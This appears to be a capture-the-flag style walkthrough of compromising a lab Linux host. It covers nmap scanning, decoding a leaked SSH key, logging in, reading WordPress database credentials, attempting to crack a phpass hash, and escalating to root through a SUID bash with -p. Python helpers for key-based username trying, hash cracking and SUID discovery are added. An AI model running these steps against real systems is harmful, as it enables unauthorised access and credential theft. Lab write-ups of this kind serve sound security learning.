Enumerating the target:
One of the most important skills of a cybersecurity analyst is extracting valuable information from what is in front of you, but before that we need to gather as much information as we possibly can.
I start my enumeration with four nmap commands against the target:
nmap <IP> # short, just to orient ourselves with what we are dealing with
nmap -sC -sV <IP> # default scripts and version detection of the software in use
nmap -sC -sV -p- -A -oA nmap_tcp <IP> # the longest scan: all TCP ports, saved in all three output formats (-A already implies -sC -sV, -O and --traceroute)
nmap -sU <IP> # UDP scan, in case there are open UDP services (SNMP, for example)
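The full -p- scan is slow, and running -sC -sV against every port is what makes it slow. A workflow I use is to run the port sweep first, pull the open ports out of the XML that -oA writes, and then run the script and version scan only against those. The parser below is an added example, not part of the original writeup or of nmap itself; the XML is a constructed sample in nmap's -oX layout, and the ports in it are illustrative rather than the real scan result.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap's XML output (the nmap_tcp.xml that -oA writes).
# The ports are illustrative, not the original scan result.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -p- -oA nmap_tcp 192.168.175.89">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.168.175.89" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh"/></port>
      <port protocol="tcp" portid="25"><state state="filtered" reason="no-response"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http"/></port>
      <port protocol="tcp" portid="33060"><state state="open" reason="syn-ack"/><service name="mysqlx"/></port>
    </ports>
  </host>
</nmaprun>
"""


def open_ports(xml_text, proto="tcp"):
    """Return {host_ip: [open ports]} from nmap XML, ignoring closed/filtered ports."""
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ports = []
        for port in host.iter("port"):
            state = port.find("state")
            if (port.get("protocol") == proto and state is not None
                    and state.get("state") == "open"):
                ports.append(int(port.get("portid")))
        result[addr.get("addr")] = sorted(ports)
    return result


def followup_command(ip, ports):
    """Build the targeted script+version scan for only the ports found open.

    This finishes far faster than -sC -sV -p- against all 65535 ports.
    Returns None when nothing is open, so the caller does not run an empty scan.
    """
    if not ports:
        return None
    return f"nmap -sC -sV -p {','.join(map(str, ports))} -oA nmap_targeted {ip}"


if __name__ == "__main__":
    for ip, ports in open_ports(SAMPLE_XML).items():
        print(ip, ports)
        print(followup_command(ip, ports))
```

Run it against the real nmap_tcp.xml by reading the file into `open_ports`; the filtered port 25 in the sample is deliberately dropped, since scripts and version probes against a filtered port only add time.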
nmap -sC -sV 192.168.175.89
let’s see what we have there:
Also, don't forget that there are other key types besides id_rsa:
- id_ed25519
- id_dsa
- id_ecdsa
This is good to know when exploiting a directory traversal (or any arbitrary file read) vulnerability: if ~/.ssh/id_rsa does not exist, one of these may.
It looks like base64 encoding, let's decode it:
We got an id_rsa key from decoding it, so it is time to find a valid username to log in with. Let's go to the web!
We also found one more username:
After trying the first usernames we noticed, we got an initial foothold on the server:
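The decode-and-login step has a few gotchas that cost time on every box: base64 copied from a page carries line breaks, ssh refuses a key file whose permissions are too open, a key written without a trailing newline fails with "invalid format", and an ssh attempt without BatchMode will hang on a password prompt when the key is rejected. The helper below is an added example, not part of the original writeup; the base64 blob is a constructed placeholder (not a real key), and the target IP and usernames are illustrative.

```python
import base64
import binascii
import os
import re
import stat
import subprocess
import tempfile

# Constructed sample: base64 of a placeholder PEM body standing in for the blob
# found on the target. It is not a real key and will not load in ssh.
SAMPLE_B64 = base64.b64encode(
    b"-----BEGIN RSA PRIVATE KEY-----\nMIIEow...placeholder...\n-----END RSA PRIVATE KEY-----\n"
).decode()

# The file name each PEM header usually travels under in ~/.ssh. The newer
# "OPENSSH PRIVATE KEY" container can hold any type, so for that one the
# type is read afterwards with ssh-keygen -l -f.
KEY_HEADERS = {
    "RSA PRIVATE KEY": "id_rsa",
    "DSA PRIVATE KEY": "id_dsa",
    "EC PRIVATE KEY": "id_ecdsa",
    "OPENSSH PRIVATE KEY": "id_ed25519 or other (check with ssh-keygen -l -f)",
}


def decode_key(blob):
    """Decode base64 copied from a page: whitespace/line breaks are dropped first,
    and invalid input returns None instead of silently yielding garbage."""
    cleaned = "".join(blob.split())
    try:
        return base64.b64decode(cleaned, validate=True)
    except binascii.Error:
        return None


def key_kind(pem):
    """Map the PEM header to the ~/.ssh file name it normally has, or None."""
    m = re.match(rb"-----BEGIN ([A-Z ]+) PRIVATE KEY-----", pem)
    if not m:
        return None
    return KEY_HEADERS.get(m.group(1).decode() + " PRIVATE KEY")


def save_key(pem, path=None):
    """Write the key with mode 0600 and a trailing newline; ssh refuses a key
    whose permissions are too open, and a missing final newline gives 'invalid format'."""
    if path is None:
        fd, path = tempfile.mkstemp(prefix="id_")
        os.close(fd)
    with open(path, "wb") as f:
        f.write(pem if pem.endswith(b"\n") else pem + b"\n")
    os.chmod(path, 0o600)
    return path


def key_file_mode(path):
    return stat.S_IMODE(os.stat(path).st_mode)


def ssh_command(ip, keyfile, user):
    # BatchMode=yes: fail instead of prompting for a password when the key is rejected.
    # IdentitiesOnly=yes: do not try every key in the agent first.
    return ["ssh", "-i", keyfile, "-o", "IdentitiesOnly=yes", "-o", "BatchMode=yes",
            "-o", "StrictHostKeyChecking=no", "-o", "ConnectTimeout=10",
            f"{user}@{ip}", "id"]


def ssh_accepts(ip, keyfile, user):
    proc = subprocess.run(ssh_command(ip, keyfile, user), capture_output=True, text=True, timeout=30)
    return proc.returncode == 0


def first_valid_user(ip, keyfile, users, accepts=ssh_accepts):
    """Try the key against each candidate username; return the first one accepted."""
    for user in users:
        if accepts(ip, keyfile, user):
            return user
    return None


if __name__ == "__main__":
    pem = decode_key(SAMPLE_B64)
    print("key type:", key_kind(pem))
    path = save_key(pem)
    print("saved to", path, "mode", oct(key_file_mode(path)))
    # Against a real target the placeholder key is rejected for every user:
    # print(first_valid_user("192.168.175.89", path, ["alice", "bob"]))
```

If ssh asks for a passphrase, the key is encrypted; ssh2john.py from John the Ripper turns it into a crackable hash, which is the next step rather than more usernames.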
After that I like to check a few things myself first, starting with where our user is allowed to run commands on behalf of the superuser (sudo -l):
and after that I run linpeas.sh, which is incredibly fast and useful.
The most interesting findings:
The first thing I did after that was to try to log in with the disclosed credentials, but it failed:
After that, I tried to authenticate remotely to the potential MySQL server on port 33060, but that also failed (33060 is MySQL's X Protocol port rather than the classic 3306 protocol, so the standard mysql client cannot talk to it):
After that, I checked whether we have the "mysql" ELF binary on the machine, and successfully authenticated locally to the database with the credentials leaked in the "wp_config" screenshot:
After that, I found the users table, where the admin's password hash is disclosed:
Then I identified the hash type and assumed it is a WordPress (phpass) hash:
I ran hashcat on it with the rockyou wordlist, but unfortunately it failed: hashcat reported "Exhausted", meaning the whole wordlist was tried without a match:
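Knowing what is inside a `$P$` hash explains both why hashcat needs mode 400 for it and why cracking it is slow: the character after `$P$` encodes a cost, the next eight characters are the salt, and the password is run through MD5 2^cost times before the result is encoded with phpass' own base64 alphabet. The implementation below is an added example of that portable-hash algorithm, not code from the original writeup or from WordPress; the password and wordlist are constructed samples, and the hash is generated at runtime rather than taken from the target.

```python
import hashlib
import hmac
import os

# phpass' base64 alphabet (not the RFC 4648 one): index of a character is its value.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data, count):
    """phpass' own base64 variant: 3 bytes -> 4 chars, little-endian bit order, no padding."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def parse_setting(h):
    """Split a $P$/$H$ hash into prefix, cost, salt; None if it is not a phpass hash."""
    if len(h) < 12 or h[:3] not in ("$P$", "$H$"):
        return None
    count_log2 = ITOA64.find(h[3])
    if count_log2 < 7 or count_log2 > 30:  # phpass rejects costs outside this range
        return None
    return {"prefix": h[:3], "count_log2": count_log2,
            "iterations": 1 << count_log2, "salt": h[4:12], "hashcat_mode": 400}


def phpass_hash(password, setting):
    """Recompute the hash of password under the first 12 chars of an existing hash."""
    info = parse_setting(setting)
    if info is None:
        return None
    pw = password.encode()
    h = hashlib.md5(info["salt"].encode() + pw).digest()
    for _ in range(info["iterations"]):          # 2^cost rounds: this is the slow part
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def phpass_generate(password, count_log2=13):
    """New hash with a random salt. WordPress uses cost 13 (8192 rounds), so its hashes start with $P$B."""
    salt = _encode64(os.urandom(6), 6)           # 6 random bytes -> 8 salt characters
    return phpass_hash(password, "$P$" + ITOA64[count_log2] + salt)


def phpass_verify(password, stored):
    computed = phpass_hash(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)


def crack(stored, wordlist):
    """Dictionary attack; None when the list is used up, which is hashcat's 'Exhausted' status."""
    for word in wordlist:
        if phpass_verify(word, stored):
            return word
    return None


# Constructed sample: a fresh hash for a made-up password and a tiny wordlist.
SAMPLE_PASSWORD = "Winter2019!"
SAMPLE_HASH = phpass_generate(SAMPLE_PASSWORD)
SAMPLE_WORDLIST = ["123456", "password", "admin", "Winter2019!", "letmein"]

if __name__ == "__main__":
    print(SAMPLE_HASH, parse_setting(SAMPLE_HASH))
    print("cracked:", crack(SAMPLE_HASH, SAMPLE_WORDLIST))
    print("with short list:", crack(SAMPLE_HASH, ["password", "admin"]))
```

`parse_setting` is also a quick sanity check before spending GPU time: a 32-hex-character value is plain MD5 (mode 0), not phpass, and hashcat will refuse it in mode 400.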
UPDATE:
Hey! /bin/bash has a special option, -p, which forces bash to keep the effective UID it was launched with; in our case the effective UID is root. Without -p, a bash started with an effective UID different from the real UID resets the effective UID to the real one, so the setuid bit on the binary would be silently thrown away; -p lets the setuid bit take effect and keeps the user bash is setuid to.
so we just run:
/bin/bash -p
and gain root access:
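The manual checks from above (sudo rights, root-owned SUID binaries, and whether a SUID bash will actually keep root) as a small script. This is an added example, not part of the original writeup or of linpeas; `bash_effective_uid` is a model of the startup rule from bash(1) for the -p option, and the bash paths checked are assumed common locations.

```python
import os
import stat
import subprocess

BASH_PATHS = ("/bin/bash", "/usr/bin/bash", "/usr/local/bin/bash")
SKIP_PREFIXES = ("/proc", "/sys", "/dev", "/run")   # pseudo-filesystems: slow and never SUID


def has_suid_bit(path):
    """True if path is a regular file with the setuid bit; missing files are simply False."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def is_root_suid(path):
    """SUID only helps escalation when the owner is root (uid 0)."""
    try:
        return has_suid_bit(path) and os.stat(path).st_uid == 0
    except OSError:
        return False


def find_root_suid(root="/"):
    """Equivalent of `find / -type f -user root -perm -4000` (what linpeas runs)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(SKIP_PREFIXES):
            dirnames[:] = []      # prune the walk
            continue
        for name in filenames:
            p = os.path.join(dirpath, name)
            if is_root_suid(p):
                hits.append(p)
    return sorted(hits)


def bash_effective_uid(real_uid, effective_uid, privileged_mode):
    """Model of bash's startup rule (bash(1), -p): if euid != uid and -p was not
    given, bash sets euid to uid, so the SUID bit buys nothing. With -p it keeps euid."""
    if effective_uid != real_uid and not privileged_mode:
        return real_uid
    return effective_uid


def suid_bash(candidates=BASH_PATHS):
    """Bash binaries that would give a root shell via `bash -p`."""
    return [b for b in candidates if is_root_suid(b)]


def sudo_rights():
    """`sudo -l` output for the current user; None if sudo is missing or wants a
    password (-n makes it fail instead of prompting, so the script never hangs)."""
    try:
        proc = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return proc.stdout if proc.returncode == 0 else None


if __name__ == "__main__":
    uid, euid = os.getuid(), os.geteuid()
    print(f"uid={uid} euid={euid}")
    print("sudo -l:", sudo_rights() or "(nothing without a password)")
    for b in suid_bash():
        print(f"[!] {b} is SUID root: run '{b} -p' (plain '{b}' would give euid {bash_effective_uid(uid, 0, False)})")
    for p in find_root_suid():
        print("suid:", p)
```

After `bash -p` the prompt changes to `bash-5.x#` and `id` shows `uid=1000(...) euid=0(root)`; the real UID stays the low-privilege user, which is why some tools that check `getuid()` rather than `geteuid()` still think they are unprivileged.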
Thank you for your time!